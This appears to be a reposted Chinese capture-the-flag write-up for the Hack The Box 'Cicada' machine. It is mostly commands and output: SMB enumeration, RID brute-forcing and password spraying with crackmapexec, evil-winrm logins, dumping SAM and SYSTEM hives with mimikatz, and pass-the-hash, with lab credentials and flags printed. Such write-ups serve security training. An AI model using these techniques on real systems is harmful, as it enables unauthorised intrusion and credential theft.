HTB:Cicada[WriteUP]
目次连接至HTB服务器并启动靶机
使用nmap对靶机进行开放端口扫描
使用nmap对靶机开放端口进行脚本、服务信息扫描
首先尝试空暗码连接靶机SMB服务
由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破
通过该账户连接至靶机SMB服务器提取敏感信息
使用david.orelious用户凭证登录靶机SMB服务
使用evil-winrm通过上文凭证连接到靶机WinRM服务
USER_FLAG:0c79a06b429a6c9144e52201714e6328
权限提拔
尝试将注册表中的SAM、SYSTEM进行读取生存
ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005
连接至HTB服务器并启动靶机
靶机IP:10.10.11.35
分配IP:10.10.16.22
使用nmap对靶机进行开放端口扫描
nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35 https://i-blog.csdnimg.cn/direct/dce3efe916504b45893126ffea3f5979.png
将输出写入res.txt文件中,并提取端口号存入变量ports
ports=$(cat res.txt | grep ^ | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 使用nmap对靶机开放端口进行脚本、服务信息扫描
nmap -p$ports -sCV 10.10.11.35 https://i-blog.csdnimg.cn/direct/fb92bbea16d34d79b8cc30501720df86.png
首先尝试空暗码连接靶机SMB服务
smbclient -L 10.10.11.35 https://i-blog.csdnimg.cn/direct/46672c0750b541b1b533b9af09b874fb.png
列出HR共享中的全部文件
smbclient -N \\\\10.10.11.35\\HR 将Notice from HR.txt文件下载到本地
get "Notice from HR.txt" https://i-blog.csdnimg.cn/direct/e1ff45c138824fd89b58d5441c416311.png
查看该文件内容
cat 'Notice from HR.txt' https://i-blog.csdnimg.cn/direct/327863b787ad484195258424739af979.png
暗码:Cicada$M6Corpb*@Lp#nZp!8
由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser' https://i-blog.csdnimg.cn/direct/fc5ea07f2c4d4a3fbc33855a60991d75.png
将该输出生存到users.txt文件中,再将全部用户名进行提取
cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt https://i-blog.csdnimg.cn/direct/b83b41e47d984918b28c9c6eecd06836.png
使用上文拿到的暗码对靶机账户进行暗码喷洒
crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' https://i-blog.csdnimg.cn/direct/cb0b055e0e354f7a818846786c364027.png
由输出可见,该暗码对账户michael.wrightson见效
账户:michael.wrightson
暗码:Cicada$M6Corpb*@Lp#nZp!8
通过该账户连接至靶机SMB服务器提取敏感信息
crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users https://i-blog.csdnimg.cn/direct/6f069b06de4c49be8c3fa9af967f3c19.png
账户:david.orelious
暗码:aRt$Lp#7t*VQ!3
使用david.orelious用户凭证登录靶机SMB服务
smbclient -U david.orelious //10.10.11.35/DEV 将Backup_script.ps1文件下载到本地
get Backup_script.ps1 https://i-blog.csdnimg.cn/direct/93b24e4ac4504255a0fc16c8fbafa04f.png
查看该文件内容
cat Backup_script.ps1 https://i-blog.csdnimg.cn/direct/ef5492d39d0849e584a93437a554dfbf.png
账户:emily.oscars
暗码:Q!3@Lp#M6b*7t*Vt
使用evil-winrm通过上文凭证连接到靶机WinRM服务
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' 进入C盘根目次
cd C:\ 查找user_flag位置
cmd.exe /c dir /s user.txt https://i-blog.csdnimg.cn/direct/f5f40f945a954de08ca80675e67444cf.png
可以看到有两个user.txt文件,两个都查看内容发现是一样的
type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt" *Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328
*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328
USER_FLAG:0c79a06b429a6c9144e52201714e6328
权限提拔
列出全部用户组
https://i-blog.csdnimg.cn/direct/4479a1d7b02b47f4a70f61cc9999d9ae.png
可以看到该用户具有文件备份特权(SeBackupPrivilege)
尝试将注册表中的SAM、SYSTEM进行读取生存
reg save hklm\sam sam
reg save hklm\system system https://i-blog.csdnimg.cn/direct/e0869a2835af4fc7800d6a9a90991ca7.png
利用这两个注册表文件抓取靶机管理员暗码
.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit https://i-blog.csdnimg.cn/direct/26dcc2bcc74047c9939f0458d9ee5a92.png
账户:Administrator
暗码:2b87e7c93a3e8a0ea4a581937016f341
利用该哈希值直接通过evil-winrm登录靶机
evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator' https://i-blog.csdnimg.cn/direct/061ddd0abce4410b98ab68d1b22ba6b1.png
进入C盘根目次下
cd C:\ 查找root_flag位置
cmd.exe /c dir /s root.txt 查看root_flag内容
type "C:\Users\Administrator\Desktop\root.txt" *Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\
*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 1B60-8905
Directory of C:\Documents and Settings\Administrator\Desktop
10/30/2024 04:30 PM 34 root.txt
1 File(s) 34 bytes
Directory of C:\Users\Administrator\Desktop
10/30/2024 04:30 PM 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
2 File(s) 68 bytes
0 Dir(s) 1,663,627,264 bytes free
*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"
b7c206ec1a5f03f4de21e622502f4005
ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]